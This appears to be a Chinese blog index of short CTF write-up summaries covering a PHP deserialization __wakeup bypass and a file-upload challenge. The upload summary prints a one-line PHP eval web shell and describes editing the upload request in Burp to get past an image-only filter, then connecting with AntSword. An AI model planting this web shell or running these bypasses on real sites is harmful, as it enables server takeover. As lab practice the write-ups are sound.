摘要:
BUUCTF WriteUp目录 阅读全文
摘要:
攻防世界系列 :unserialize3 1.打开题目,反序列化 2.代码审计 类xctf被调用时_weakeup()函数会被自动执行,但当序列化字符串中属性值个数大于属性个数,就会导致反序列化异常,从而跳过__wakeup()。 3.构造payload O:4:"xctf":1:{s:4:"fla 阅读全文
摘要:
攻防世界系列 :upload1 1.打开题目,文件上传。 2.立即上传shell 1.php <?php @eval($_POST[root]); ?> 提示只能上传图片 3.burp改报文 把1.jpg改为1.php 上传成功 4.蚁剑连接 一顿乱翻找到了flag.php 阅读全文